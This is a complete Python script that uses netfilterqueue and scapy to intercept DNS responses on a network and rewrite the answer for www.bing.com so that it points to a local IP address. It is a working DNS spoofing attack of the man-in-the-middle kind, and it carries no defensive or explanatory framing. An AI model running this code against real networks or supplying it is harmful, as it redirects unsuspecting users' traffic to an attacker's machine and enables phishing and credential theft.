#!/usr/bin/python3.8

import netfilterqueue
import scapy.all as scapy

def process_packet(packet):
	scapy_packet = scapy.IP(packet.get_payload())
	if scapy_packet.haslayer(scapy.DNSRR):
		qname = scapy_packet[scapy.DNSQR].qname
		if 'www.bing.com' in str(qname):
			print(scapy_packet.show())
			print('[+] Spoofing target...')
			answer = scapy.DNSRR(rrname=qname,rdata='192.168.123.1')
			scapy_packet[scapy.DNS].an = answer
			scapy_packet[scapy.DNS].ancount = 1
			del scapy_packet[scapy.IP].len
			del scapy_packet[scapy.IP].chksum
			del scapy_packet[scapy.UDP].len
			del scapy_packet[scapy.UDP].chksum
			
			packet.set_payload(bytes(scapy_packet))
			print(scapy.IP(packet.get_payload()).show())
	packet.accept()

queue = netfilterqueue.NetfilterQueue()
queue.bind(0,process_packet)
queue.run()